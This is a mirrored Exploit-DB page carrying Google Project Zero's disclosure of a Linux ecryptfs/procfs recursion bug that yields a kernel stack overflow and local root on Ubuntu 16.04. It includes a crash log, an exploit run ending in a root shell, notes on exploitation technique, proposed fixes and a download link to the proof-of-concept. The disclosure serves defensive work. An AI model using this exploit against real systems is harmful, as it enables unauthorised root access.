Linux Kernel – ‘ecryptfs’ ‘/proc/$pid/environ’ Local Privilege Escalation

Exploit Database
148 阅读

作者： Google Security Research

日期： 2016-06-21
类别：
- local
平台：
- linux
来源：https://www.exploit-db.com/exploits/39992/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

172

173

174

175

176

177

178

179

180

181

182

183

184

185

186

187

188

189

190

191

192

193

194

195

196

197

198

199

200

201

202

203

204

205

206

207

208

209

210

211

212

213

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=836

Stacking filesystems, including ecryptfs, protect themselves against

deep nesting, which would lead to kernel stack overflow, by tracking

the recursion depth of filesystems. E.g. in ecryptfs, this is

implemented in ecryptfs_mount() as follows:

s->s_stack_depth = path.dentry->d_sb->s_stack_depth + 1;

rc = -EINVAL;

if (s->s_stack_depth > FILESYSTEM_MAX_STACK_DEPTH) {

pr_err("eCryptfs: maximum fs stacking depth exceeded\n");

goto out_free;

}

The files /proc/$pid/{mem,environ,cmdline}, when read, access the

userspace memory of the target process, involving, if necessary,

normal pagefault handling. If it was possible to mmap() them, an

attacker could create a chain of e.g. /proc/$pid/environ mappings

where process 1 has /proc/2/environ mapped into its environment area,

process 2 has /proc/3/environ mapped into its environment area and so

on. A read from /proc/1/environ would invoke the pagefault handler for

process 1, which would invoke the pagefault handler for process 2 and

so on. This would, again, lead to kernel stack overflow.

One interesting fact about ecryptfs is that, because of the encryption

involved, it doesn't just forward mmap to the lower file's mmap

operation. Instead, it has its own page cache, maintained using the

normal filemap helpers, and performs its cryptographic operations when

dirty pages need to be written out or when pages need to be faulted

in. Therefore, not just its read and write handlers, but also its mmap

handler only uses the lower filesystem's read and write methods.

This means that using ecryptfs, you can mmap [decrypted views of]

files that normally wouldn't be mappable.

Combining these things, it is possible to trigger recursion with

arbitrary depth where:

a reading userspace memory access in process A (from userland or from

copy_from_user())

causes a pagefault in an ecryptfs mapping in process A, which

causes a read from /proc/{B}/environ, which

causes a pagefault in an ecryptfs mapping in process B, which

causes a read from /proc/{C}/environ, which

causes a pagefault in an ecryptfs mapping in process C, and so on.

On systems with the /sbin/mount.ecryptfs_private helper installed

(e.g. Ubuntu if the "encrypt my home directory" checkbox is ticked

during installation), this bug can be triggered by an unprivileged

user. The mount helper considers /proc/$pid, where $pid is the PID of

a process owned by the user, to be a valid mount source because the

directory is "owned" by the user.

I have attached both a generic crash PoC and a build-specific exploit

that can be used to gain root privileges from a normal user account on

Ubuntu 16.04 with kernel package linux-image-4.4.0-22-generic, version

4.4.0-22.40, uname "Linux user-VirtualBox 4.4.0-22-generic #40-Ubuntu

SMP Thu May 12 22:03:46 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux".

dmesg output of the crasher:

</code><code>

[ 80.036069] BUG: unable to handle kernel paging request at fffffffe4b9145c0

[ 80.040028] IP: [<ffffffff810c9a33>] cpuacct_charge+0x23/0x40

[ 80.040028] PGD 1e0d067 PUD 0

[ 80.040028] Thread overran stack, or stack corrupted

[ 80.040028] Oops: 0000 [#1] SMP

[ 80.040028] Modules linked in: vboxsf drbg ansi_cprng xts gf128mul dm_crypt snd_intel8x0 snd_ac97_codec ac97_bus snd_pcm snd_seq_midi snd_seq_midi_event snd_rawmidi vboxvideo snd_seq ttm snd_seq_device drm_kms_helper snd_timer joydev drm snd fb_sys_fops soundcore syscopyarea sysfillrect sysimgblt vboxguest input_leds i2c_piix4 8250_fintek mac_hid serio_raw parport_pc ppdev lp parport autofs4 hid_generic usbhid hid psmouse ahci libahci e1000 pata_acpi fjes video

[ 80.040028] CPU: 0 PID: 2135 Comm: crasher Not tainted 4.4.0-22-generic #40-Ubuntu

[ 80.040028] Hardware name: innotek GmbH VirtualBox/VirtualBox, BIOS VirtualBox 12/01/2006

[ 80.040028] task: ffff880035443200 ti: ffff8800d933c000 task.ti: ffff8800d933c000

[ 80.040028] RIP: 0010:[<ffffffff810c9a33>][<ffffffff810c9a33>] cpuacct_charge+0x23/0x40

[ 80.040028] RSP: 0000:ffff88021fc03d70EFLAGS: 00010046

[ 80.040028] RAX: 000000000000dc68 RBX: ffff880035443260 RCX: ffffffffd933c068

[ 80.040028] RDX: ffffffff81e50560 RSI: 000000000013877a RDI: ffff880035443200

[ 80.040028] RBP: ffff88021fc03d70 R08: 0000000000000000 R09: 0000000000010000

[ 80.040028] R10: 0000000000002d4e R11: 00000000000010ae R12: ffff8802137aa200

[ 80.040028] R13: 000000000013877a R14: ffff880035443200 R15: ffff88021fc0ee68

[ 80.040028] FS:00007fbd9fadd700(0000) GS:ffff88021fc00000(0000) knlGS:0000000000000000

[ 80.040028] CS:0010 DS: 0000 ES: 0000 CR0: 0000000080050033

[ 80.040028] CR2: fffffffe4b9145c0 CR3: 0000000035415000 CR4: 00000000000006f0

[ 80.040028] Stack:

[ 80.040028]ffff88021fc03db0 ffffffff810b4b83 0000000000016d00 ffff88021fc16d00

[ 80.040028]ffff880035443260 ffff8802137aa200 0000000000000000 ffff88021fc0ee68

[ 80.040028]ffff88021fc03e30 ffffffff810bb414 ffff88021fc03dd0 ffff880035443200

[ 80.040028] Call Trace:

[ 80.040028]<IRQ>

[ 80.040028][<ffffffff810b4b83>] update_curr+0xe3/0x160

[ 80.040028][<ffffffff810bb414>] task_tick_fair+0x44/0x8e0

[ 80.040028][<ffffffff810b1267>] ? sched_clock_local+0x17/0x80

[ 80.040028][<ffffffff810b146f>] ? sched_clock_cpu+0x7f/0xa0

[ 80.040028][<ffffffff810ad35c>] scheduler_tick+0x5c/0xd0

[ 80.040028][<ffffffff810fe560>] ? tick_sched_handle.isra.14+0x60/0x60

[ 80.040028][<ffffffff810ee961>] update_process_times+0x51/0x60

[ 80.040028][<ffffffff810fe525>] tick_sched_handle.isra.14+0x25/0x60

[ 80.040028][<ffffffff810fe59d>] tick_sched_timer+0x3d/0x70

[ 80.040028][<ffffffff810ef282>] __hrtimer_run_queues+0x102/0x290

[ 80.040028][<ffffffff810efa48>] hrtimer_interrupt+0xa8/0x1a0

[ 80.040028][<ffffffff81052fa8>] local_apic_timer_interrupt+0x38/0x60

[ 80.040028][<ffffffff81827d9d>] smp_apic_timer_interrupt+0x3d/0x50

[ 80.040028][<ffffffff81826062>] apic_timer_interrupt+0x82/0x90

[ 80.040028]<EOI>

[ 80.040028] Code: 0f 1f 84 00 00 00 00 00 66 66 66 66 90 48 8b 47 08 48 8b 97 78 07 00 00 55 48 63 48 10 48 8b 52 60 48 89 e5 48 8b 82 b8 00 00 00 <48> 03 04 cd 80 42 f3 81 48 01 30 48 8b 52 48 48 85 d2 75 e5 5d

[ 80.040028] RIP[<ffffffff810c9a33>] cpuacct_charge+0x23/0x40

[ 80.040028]RSP <ffff88021fc03d70>

[ 80.040028] CR2: fffffffe4b9145c0

[ 80.040028] fbcon_switch: detected unhandled fb_set_par error, error code -16

[ 80.040028] ---[ end trace 616e3de50958c35b ]---

[ 80.040028] Kernel panic - not syncing: Fatal exception in interrupt

[ 80.040028] Shutting down cpus with NMI

[ 80.040028] Kernel Offset: disabled

[ 80.040028] ---[ end Kernel panic - not syncing: Fatal exception in interrupt

</code><code>

example run of the exploit, in a VM with 4 cores, with Ubuntu 16.04 installed:

</code><code>

user@user-VirtualBox:/media/sf_vm_shared/crypt_endless_recursion/exploit$ ls

compile.shexploit.chello.csuidhelper.c

user@user-VirtualBox:/media/sf_vm_shared/crypt_endless_recursion/exploit$ ./compile.sh

user@user-VirtualBox:/media/sf_vm_shared/crypt_endless_recursion/exploit$ ls

compile.shexploitexploit.chellohello.csuidhelpersuidhelper.c

user@user-VirtualBox:/media/sf_vm_shared/crypt_endless_recursion/exploit$ ./exploit

all spammers ready

recurser parent ready

spam over

fault chain set up, faulting now

writing stackframes

stackframes written

killing 2494

post-corruption code is alive!

children should be dead

coredump handler set. recurser exiting.

going to crash now

suid file detected, launching rootshell...

we have root privs now...

root@user-VirtualBox:/proc# id

uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare),999(vboxsf),1000(user)

</code><code>

(If the exploit crashes even with the right kernel version, try

restarting the machine. Also, ensure that no program like top/htop/...

is running that might try to read process command lines. Note that

the PoC and the exploit don't really clean up after themselves and

leave mountpoints behind that prevent them from re-running without

a reboot or manual unmounting.)

Note that Ubuntu compiled their kernel with

CONFIG_SCHED_STACK_END_CHECK turned on, making it harder than it used

to be in the past to not crash the kernel while exploiting this bug,

and an overwrite of addr_limit would be useless because at the

time the thread_info is overwritten, there are multiple instances of

kernel_read() on the stack. Still, the bug is exploitable by carefully

aligning the stack so that the vital components of thread_info are

preserved, stopping with an out-of-bounds stack pointer and

overwriting the thread stack using a normal write to an adjacent

allocation of the buddy allocator.

Regarding the fix, I think the following would be reasonable:

- Explicitly forbid stacking anything on top of procfs by setting its

s_stack_depth to a sufficiently large value. In my opinion, there

is too much magic going on inside procfs to allow stacking things

on top of it, and there isn't any good reason to do it. (For

example, ecryptfs invokes open handlers from a kernel thread

instead of normal user process context, so the access checks inside

VFS open handlers are probably ineffective - and procfs relies

heavily on those.)

- Forbid opening files with f_op->mmap==NULL through ecryptfs. If the

lower filesystem doesn't expect to be called in pagefault-handling

context, it probably shouldn't be called in that context.

- Create a dedicated kernel stack cache outside of the direct mapping

of physical memory that has a guard page (or a multi-page gap) at

the bottom of each stack, and move the struct thread_info to a

different place (if nothing else works, the top of the stack, above

the pt_regs).

While e.g. race conditions are more common than stack overflows in

the Linux kernel, the whole vulnerability class of stack overflows

is easy to mitigate, and the kernel is sufficiently complicated for

unbounded recursion to emerge in unexpected places - or perhaps

even for someone to discover a way to create a stack with a bounded

length that is still too high. Therefore, I believe that guard

pages are a useful mitigation.

Nearly everywhere, stack overflows are caught using guard pages

nowadays; this includes Linux userland, but also {### TODO ###}

and, on 64-bit systems, grsecurity (using GRKERNSEC_KSTACKOVERFLOW).

Oh, and by the way: The <code>BUG_ON(task_stack_end_corrupted(prev))

in schedule_debug() ought to be a direct panic instead of an oops. At

the moment, when you hit it, you get a recursion between the scheduler

invocation in do_exit() and the BUG_ON in the scheduler, and the

kernel recurses down the stack until it hits something sufficiently

important to cause a panic.

I'm going to send (compile-tested) patches for my first two fix

suggestions and the recursive oops bug. I haven't written a patch for

the guard pages mitigation - I'm not familiar enough with the x86

subsystem for that.

Notes regarding the exploit:

It makes an invalid assumption that causes it to require at least around 6GB of RAM.

It has a trivially avoidable race that causes it to fail on single-core systems after overwriting the coredump handler; if this happens, it's still possible to manually trigger a coredump and execute the suid helper to get a root shell.

The page spraying is pretty primitive and racy; while it works reliably for me, there might be influencing factors that cause it to fail on other people's machines.

Proof of Concept:

https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39992.zip